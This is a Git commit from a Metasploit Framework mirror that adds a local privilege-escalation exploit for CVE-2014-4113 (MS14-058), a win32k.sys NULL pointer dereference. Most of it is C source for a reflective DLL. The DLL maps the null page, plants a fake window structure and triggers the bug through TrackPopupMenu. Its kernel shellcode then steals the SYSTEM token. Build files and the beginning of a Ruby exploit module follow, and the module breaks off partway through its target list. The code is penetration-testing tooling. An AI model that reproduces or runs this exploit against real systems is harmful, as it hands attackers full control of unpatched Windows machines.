dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Land #4064, Win32k.sys NULL Pointer Dereference

This commit is contained in:
Spencer McIntyre 2014-10-27 14:01:07 -04:00
parent 090d9b95d1 f24129933f
commit 04a99f09bb
No known key found for this signature in database
GPG Key ID: C00D6B6AA5E15412
9 changed files with 1005 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll Executable file
View File

Binary file not shown.

151
external/source/exploits/cve-2014-4113/.gitignore vendored Executable file
View File

@ -0,0 +1,151 @@
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
# User-specific files
*.suo
*.user
*.sln.docstates
# Build results
[Dd]ebug/
[Rr]elease/
x64/
build/
[Bb]in/
[Oo]bj/
# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
!packages/*/build/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
*_i.c
*_p.c
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.log
*.scc
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opensdf
*.sdf
*.cachefile
# Visual Studio profiler
*.psess
*.vsp
*.vspx
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# NCrunch
*.ncrunch*
.*crunch*.local.xml
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.Publish.xml
*.pubxml
# NuGet Packages Directory
## TODO: If you have NuGet Package Restore enabled, uncomment the next line
#packages/
# Windows Azure Build Output
csx
*.build.csdef
# Windows Store app package directory
AppPackages/
# Others
sql/
*.Cache
ClientBin/
[Ss]tyle[Cc]op.*
~$*
*~
*.dbmdl
*.[Pp]ublish.xml
*.pfx
*.publishsettings
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file to a newer
# Visual Studio version. Backup files are not needed, because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
# SQL Server files
App_Data/*.mdf
App_Data/*.ldf
# =========================
# Windows detritus
# =========================
# Windows image file caches
Thumbs.db
ehthumbs.db
# Folder config file
Desktop.ini
# Recycle Bin used on file shares
$RECYCLE.BIN/
# Mac crap
.DS_Store

28
external/source/exploits/cve-2014-4113/cve-2014-4113.sln vendored Executable file
View File

@ -0,0 +1,28 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Express 2013 for Windows Desktop
VisualStudioVersion = 12.0.30723.0
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2014-4113", "cve-2014-4113\cve-2014-4113.vcxproj", "{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Debug|x64 = Debug|x64
Release|Win32 = Release|Win32
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.ActiveCfg = Debug|Win32
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.Build.0 = Debug|Win32
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.ActiveCfg = Debug|x64
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.Build.0 = Debug|x64
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.ActiveCfg = Release|Win32
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.Build.0 = Release|Win32
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.ActiveCfg = Release|x64
{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.Build.0 = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

490
external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c vendored Executable file
View File

@ -0,0 +1,490 @@
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
// Purloined from ntstatus.h
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth
#define WIN32_NO_STATUS
#include <windows.h>
#undef WIN32_NO_STATUS
#ifndef _NTDEF_
typedef __success(return >= 0) LONG NTSTATUS;
typedef NTSTATUS *PNTSTATUS;
#endif
#define DEBUGGING FALSE
#ifdef _M_X64
typedef unsigned __int64 QWORD;
typedef QWORD *PQWORD;
#endif
int WndProcClue = 0;
int HookCallbackClue = 0;
WNDPROC lpPrevWndFunc;
DWORD MyProcessId = 0;
DWORD OffsetWindows = 0;
typedef NTSTATUS(NTAPI *lNtAllocateVirtualMemory)(
IN HANDLE ProcessHandle,
IN PVOID *BaseAddress,
IN PULONG ZeroBits,
IN PSIZE_T RegionSize,
IN ULONG AllocationType,
IN ULONG Protect
);
typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)(
IN HANDLE ProcessId,
OUT PVOID Process
);
typedef NTSTATUS(NTAPI *lZwQuerySystemInformation)(
_In_ DWORD SystemInformationClass,
_Inout_ PVOID SystemInformation,
_In_ ULONG SystemInformationLength,
_Out_opt_ PULONG ReturnLength
);
typedef struct _SYSTEM_MODULE {
HANDLE Reserved1;
PVOID Reserved2;
PVOID ImageBaseAddress;
ULONG ImageSize;
ULONG Flags;
USHORT Id;
USHORT Rank;
USHORT w018;
USHORT NameOffset;
BYTE Name[256];
} SYSTEM_MODULE, *PSYSTEM_MODULE;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG ModulesCount;
SYSTEM_MODULE Modules[0];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL;
lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL;
long CALLBACK HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
{
EndMenu();
return -5;
}
LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam) {
#ifdef _M_X64
if (*(DWORD *)(lParam + 16) == 0x1EB && !HookCallbackClue)
#else
if (*(DWORD *)(lParam + 8) == 0x1EB && !HookCallbackClue)
#endif
{
HookCallbackClue = 1;
if (UnhookWindowsHook(WH_CALLWNDPROC, HookCallback)) {
#ifdef _M_X64
lpPrevWndFunc = (WNDPROC)SetWindowLongPtr(*(HWND *)(lParam + 24), GWLP_WNDPROC, (ULONG_PTR)HookCallbackTwo);
#else
lpPrevWndFunc = (WNDPROC)SetWindowLongA(*(HWND *)(lParam + 12), GWLP_WNDPROC, (LONG)HookCallbackTwo);
#endif
}
}
return CallNextHookEx(0, code, wParam, lParam);
}
LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
if (msg == 289 && WndProcClue != 1) {
WndProcClue = 1;
PostMessageA(hwnd, 256, 40, 0);
PostMessageA(hwnd, 256, 39, 0);
PostMessageA(hwnd, 513, 0, 0);
}
return DefWindowProc(hwnd, msg, wParam, lParam);
}
#ifdef _M_X64
QWORD MyPtiCurrent(void) {
void *teb = (void *)__readgsqword(0x30);
QWORD Win32ThreadInfo = (QWORD)*((PQWORD)((PBYTE)teb + 0x78));
return Win32ThreadInfo;
}
#else
DWORD __stdcall MyPtiCurrent() {
__asm {
mov eax, fs : 18h
mov eax, [eax + 40h]
}
}
#endif
int _stdcall shellcode_ring0(int one, int two, int three, int four) {
void *my_process_info = NULL;
void *system_info = NULL;
pPsLookupProcessByProcessId((HANDLE)MyProcessId, &my_process_info);
pPsLookupProcessByProcessId((HANDLE)4, &system_info);
*(PDWORD)((PBYTE)my_process_info + OffsetWindows) = *(PDWORD)((PBYTE)system_info + OffsetWindows);
return 0;
}
void
LogMessage(char* pszFormat, ...) {
if (DEBUGGING != TRUE) {
return;
}
static char s_acBuf[2048];
va_list args;
va_start(args, pszFormat);
vsprintf(s_acBuf, pszFormat, args);
printf("%s\n", s_acBuf);
OutputDebugString(s_acBuf);
va_end(args);
}
DWORD WINAPI ExecutePayload(LPVOID lpPayload) {
VOID(*lpCode)() = (VOID(*)())lpPayload;
lpCode();
return ERROR_SUCCESS;
}
void Win32kNullPage(LPVOID lpPayload) {
HWND hWnd;
WNDCLASSA WndClass;
LPBYTE promise_land = NULL;
HMODULE hNtdll = NULL;
HMODULE ntkrnl = NULL;
NTSTATUS status;
PULONG pSystemInfoBuffer = NULL;
lZwQuerySystemInformation pZwQuerySystemInformation = NULL;
ULONG SystemInfoBufferSize = 0;
char nt_name[256];
PVOID nt_base;
OSVERSIONINFOA VersionInformation;
// Getting Windows version
LogMessage("[*] Getting Windows version...");
memset(&VersionInformation, 0, sizeof(OSVERSIONINFOA));
VersionInformation.dwOSVersionInfoSize = 148;
if (!GetVersionExA(&VersionInformation)) {
LogMessage("[!] Failed to get windows version");
return;
}
#ifdef _M_X64
if (VersionInformation.dwMajorVersion == 6 && VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
LogMessage("[*] Windows 6.1 found...");
OffsetWindows = 0x208;
}
#else
if (VersionInformation.dwMajorVersion == 6) {
if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
LogMessage("[*] Windows 6.1 found...");
OffsetWindows = 0xf8;
}
else if (!VersionInformation.dwMinorVersion) {
LogMessage("[*] Windows 6.0 found..."); // Ex: Windows 2008 R2
OffsetWindows = 0xe0;
}
else {
LogMessage("[!] Unsupported Windows 6.%d found, only 6.0 and 6.1 supported atm", VersionInformation.dwMinorVersion);
return;
}
}
else if (VersionInformation.dwMajorVersion == 5) {
if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows XP SP3
LogMessage("[*] Windows 5.1 found...");
OffsetWindows = 0xc8;
}
else if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 2) { // Ex: Windows 2003 SP2
LogMessage("[*] Windows 5.2 found...");
OffsetWindows = 0xd8;
}
else {
LogMessage("[!] Unsupported Windows 5 found, only 5.1 and 5.2 supported atm");
return;
}
}
#endif
else {
LogMessage("[!] Major Version %d found, not supported", VersionInformation.dwMajorVersion);
return;
}
// Solve symbols
LogMessage("[*] Solving symbols...");
hNtdll = LoadLibraryA("ntdll");
if (hNtdll == NULL) {
LogMessage("[!] Failed to Load ntdll...");
return;
}
pZwQuerySystemInformation = (lZwQuerySystemInformation)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
if (pZwQuerySystemInformation == NULL) {
LogMessage("[!] Failed to solve ZwQuerySystemInformation");
return;
}
pNtAllocateVirtualMemory = (lNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
if (pNtAllocateVirtualMemory == NULL) {
LogMessage("[!] Failed to solve NtAllocateVirtualMemory");
return;
}
LogMessage("[*] Requesting Kernel loaded modules...");
status = pZwQuerySystemInformation(11, &SystemInfoBufferSize, 0, &SystemInfoBufferSize);
if (SystemInfoBufferSize == 0) {
LogMessage("[!] Requesting pZwQuerySystemInformation required length failed");
return;
}
else {
LogMessage("[*] pZwQuerySystemInformation required length %d", SystemInfoBufferSize);
}
pSystemInfoBuffer = (PULONG)LocalAlloc(LMEM_ZEROINIT, SystemInfoBufferSize);
if (pSystemInfoBuffer == NULL) {
LogMessage("[!] Allocation for SystemInfo failed");
return;
}
status = pZwQuerySystemInformation(11, pSystemInfoBuffer, SystemInfoBufferSize, &SystemInfoBufferSize);
if (status != STATUS_SUCCESS) {
LogMessage("[!] Requesting kernel modules through ZwQuerySystemInformation failed");
return;
}
LogMessage("[*] Parsing SYSTEM_INFO...");
SYSTEM_MODULE_INFORMATION *smi = (SYSTEM_MODULE_INFORMATION *)pSystemInfoBuffer;
LogMessage("[*] %d Kernel modules found\n", smi->ModulesCount);
memset(nt_name, 0, 256);
int i = 0;
while (i < smi->ModulesCount) {
SYSTEM_MODULE *sm = (SYSTEM_MODULE *)(smi->Modules + i);
LogMessage("[*] Checking module %s", sm->Name);
if (strstr((char *)sm->Name, ".exe")) {
char *start = strstr((char *)sm->Name, "nt");
if (start != NULL) {
nt_base = sm->ImageBaseAddress;
strncpy_s(nt_name, 256, start, _TRUNCATE);
break;
}
}
i++;
}
if (nt_name == NULL) {
LogMessage("[!] nt not found");
return;
}
else {
LogMessage("[*] Good! nt found as %s at 0x%08x", nt_name, nt_base);
}
ntkrnl = LoadLibraryA(nt_name);
LogMessage("[*] %s loaded in userspace at: %08x\n", nt_name, ntkrnl);
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)GetProcAddress(ntkrnl, "PsLookupProcessByProcessId");
if (pPsLookupProcessByProcessId == NULL) {
LogMessage("[!] Failed to solve PsLookupProcessByProcessId\n");
return;
}
#ifdef _M_X64
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((QWORD)nt_base + ((QWORD)pPsLookupProcessByProcessId - (QWORD)ntkrnl));
LogMessage("[*] pPsLookupProcessByProcessId in kernel: %016llx\n", pPsLookupProcessByProcessId);
#else
pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD)nt_base + ((DWORD)pPsLookupProcessByProcessId - (DWORD)ntkrnl));
LogMessage("[*] pPsLookupProcessByProcessId in kernel: %08x\n", pPsLookupProcessByProcessId);
#endif
MyProcessId = GetCurrentProcessId();
// Register Class
LogMessage("[*] Registering class...");
memset(&WndClass, 0, sizeof(WNDCLASSA));
WndClass.lpfnWndProc = WndProc; // Called with CallWindowProc => http://msdn.microsoft.com/en-us/library/windows/desktop/ms633571(v=vs.85).aspx
WndClass.lpszClassName = "woqunimalegebi";
if (RegisterClassA(&WndClass) == 0) {
LogMessage("[!] RegisterClassA failed ");
return;
}
// Create Window
LogMessage("[*] Creating window...");
hWnd = CreateWindowExA(0, "woqunimalegebi", NULL, 0, -1, -1, 0, 0, NULL, NULL, NULL, NULL);
if (hWnd == NULL) {
LogMessage("[!] CreateWindowExA failed");
return;
}
// Making everything ready for exploitation...
LogMessage("[*] Allocating null page...");
#ifdef _M_X64
ULONGLONG base_address = 0x00000000fffffffb;
#else
DWORD base_address = 1;
#endif
SIZE_T region_size = 0x1000;
ULONG zero_bits = 0;
HANDLE current_process = NULL;
current_process = GetCurrentProcess();
if (pNtAllocateVirtualMemory(current_process, (LPVOID*)(&base_address), 0, &region_size, (MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN), PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS) {
LogMessage("[!] Failed to allocate null page");
return;
}
LogMessage("[*] Getting PtiCurrent...");
#ifdef _M_X64
ULONGLONG pti = MyPtiCurrent();
#else
DWORD pti = MyPtiCurrent();
#endif
if (pti == 0) {
LoadLibrary("user32.dll");
LoadLibrary("gdi32.dll");
pti = MyPtiCurrent();
}
if (pti == 0) {
LogMessage("[!] Filed to get PtiCurrent");
return;
}
else {
#ifdef _M_X64
LogMessage("[*] Good! pti 0x%016llx", pti);
#else
LogMessage("[*] Good! pti 0x%08x", pti);
#endif
}
LogMessage("[*] Creating a fake structure at NULL...");
#ifdef _M_X64
void *test = NULL;
(QWORD)test = 0x10000000B;
*((PQWORD)test) = pti;
/* win32k!tagWND->bServerSideWindowProc = TRUE */
(QWORD)test = 0x100000025;
*((PBYTE)test) = 4;
/* win32k!tagWND->lpfnWndProc = &shellcode_ring0 */
(QWORD)test = 0x10000008B;
*((PQWORD)test) = &shellcode_ring0;
#else
void *test = promise_land + 3;
/* We need to save this check, otherwise unmapped memory will be dereferenced (blue screen)
.text:BF8B93F4 02C mov edi, _gptiCurrent
.text:BF8B93FA 02C cmp edi, [esi + 8];
.text:BF8B93FD 02C jz loc_BF8B
*/
*(LPDWORD)test = pti;
*((LPBYTE)(promise_land + 0x11)) = 0x4;
test = promise_land + 0x5b;
*(LPDWORD)test = (DWORD)shellcode_ring0;
#endif
// Exploit!
LogMessage("[*] Triggering vulnerability...");
HMENU MenuOne = CreatePopupMenu();
if (MenuOne == NULL) {
LogMessage("[!] First CreatePopupMenu failed");
return;
}
MENUITEMINFOA MenuOneInfo;
memset(&MenuOneInfo, 0, sizeof(MENUITEMINFOA));
MenuOneInfo.cbSize = sizeof(MENUITEMINFOA);
MenuOneInfo.fMask = MIIM_STRING;
if (InsertMenuItemA(MenuOne, 0, TRUE, &MenuOneInfo) != TRUE) {
LogMessage("[!] First InsertMenuItemA failed");
DestroyMenu(MenuOne);
return;
}
HMENU MenuTwo = CreatePopupMenu();
if (MenuTwo == NULL) {
LogMessage("[!] Second CreatePopupMenu failed");
DestroyMenu(MenuOne);
return;
}
MENUITEMINFOA MenuTwoInfo;
memset(&MenuTwoInfo, 0, sizeof(MENUITEMINFOA));
MenuTwoInfo.cbSize = sizeof(MENUITEMINFOA);
MenuTwoInfo.fMask = (MIIM_STRING | MIIM_SUBMENU);
MenuTwoInfo.dwTypeData = "";
MenuTwoInfo.cch = 1;
MenuTwoInfo.hSubMenu = MenuOne;
if (InsertMenuItemA(MenuTwo, 0, TRUE, &MenuTwoInfo) != TRUE) {
LogMessage("[!] Second InsertMenuItemA failed");
DestroyMenu(MenuTwo);
DestroyMenu(MenuOne);
return;
}
if (SetWindowsHookExA(WH_CALLWNDPROC, HookCallback, NULL, GetCurrentThreadId()) == NULL) {
LogMessage("[!] SetWindowsHookExA failed :-(\n");
DestroyMenu(MenuTwo);
DestroyMenu(MenuOne);
return;
}
// 'crash' it!
TrackPopupMenu(MenuTwo, 0, -10000, -10000, 0, hWnd, NULL);
// If everything worked process should be privileges at this point
LogMessage("[!] Executing payload...");
CreateThread(0, 0, ExecutePayload, lpPayload, 0, NULL);
return;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
BOOL bReturnValue = TRUE;
switch (dwReason) {
case DLL_QUERY_HMODULE:
hAppInstance = hinstDLL;
if (lpReserved != NULL) {
*(HMODULE *)lpReserved = hAppInstance;
}
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
Win32kNullPage(lpReserved);
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
};

150
external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.vcxproj vendored Executable file
View File

@ -0,0 +1,150 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}</ProjectGuid>
<RootNamespace>cve20144113</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>false</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<CompileAs>CompileAsC</CompileAs>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<OptimizeReferences>true</OptimizeReferences>
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<CompileAs>CompileAsC</CompileAs>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<OptimizeReferences>true</OptimizeReferences>
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<CompileAs>CompileAsC</CompileAs>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<CompileAs>Default</CompileAs>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<GenerateDebugInformation>false</GenerateDebugInformation>
<OptimizeReferences>true</OptimizeReferences>
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<CompileAs>CompileAsC</CompileAs>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<CompileAs>Default</CompileAs>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<GenerateDebugInformation>false</GenerateDebugInformation>
<OptimizeReferences>true</OptimizeReferences>
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="cve-2014-4113.c" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

17
external/source/exploits/cve-2014-4113/make.msbuild vendored Executable file
View File

@ -0,0 +1,17 @@
<?xml version="1.0" standalone="yes"?>
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<SolutionPath>.\cve-2014-4113.sln</SolutionPath>
</PropertyGroup>
<Target Name="all" DependsOnTargets="x86" />
<Target Name="x86">
<Message Text="Building CVE-2014-4113 win32k_null_page x86 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
</Target>
<Target Name="x64">
<Message Text="CVE-2014-4113 is not supported in x64" />
</Target>
</Project>

15
external/source/exploits/make.bat vendored
View File

@ -47,6 +47,13 @@ IF "%ERRORLEVEL%"=="0" (
POPD
)
IF "%ERRORLEVEL%"=="0" (
ECHO "Building CVE-2014-4113 (win32k_null_page)"
PUSHD CVE-2014-4113
msbuild.exe make.msbuild /target:%PLAT%
POPD
)
IF "%ERRORLEVEL%"=="0" (
ECHO "Building CVE-2013-1300 (schlamperei)"
PUSHD CVE-2013-1300
@ -60,8 +67,8 @@ IF "%ERRORLEVEL%"=="0" (
msbuild.exe make.msbuild /target:%PLAT%
POPD
)
)
IF "%ERRORLEVEL%"=="0" (
ECHO "Building bypassuac (in-memory)"
PUSHD bypassuac_injection
@ -69,8 +76,8 @@ IF "%ERRORLEVEL%"=="0" (
POPD
)
)
)
IF "%ERRORLEVEL%"=="0" (
ECHO "Building IE11 Sandbox bypasses"
PUSHD IE11SandboxEscapes

158
modules/exploits/windows/local/ms14_058_track_popup_menu.rb Normal file
View File

@ -0,0 +1,158 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::FileInfo
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info={})
super(update_info(info, {
'Name' => 'Windows TrackPopupMenu Win32k NULL Pointer Dereference',
'Description' => %q{
This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability
can be triggered through the use of TrackPopupMenu. Under special conditions, the
NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary
code execution. This module has been tested successfully on Windows XP SP3, Windows
2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows
2008 R2 SP1 64 bits.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # vulnerability discovery and exploit in the wild
'juan vazquez', # msf module (x86 target)
'Spencer McIntyre' # msf module (x64 target)
],
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Targets' =>
[
# Tested on (32 bits):
# * Windows XP SP3
# * Windows 2003 SP2
# * Windows 7 SP1
# * Windows 2008
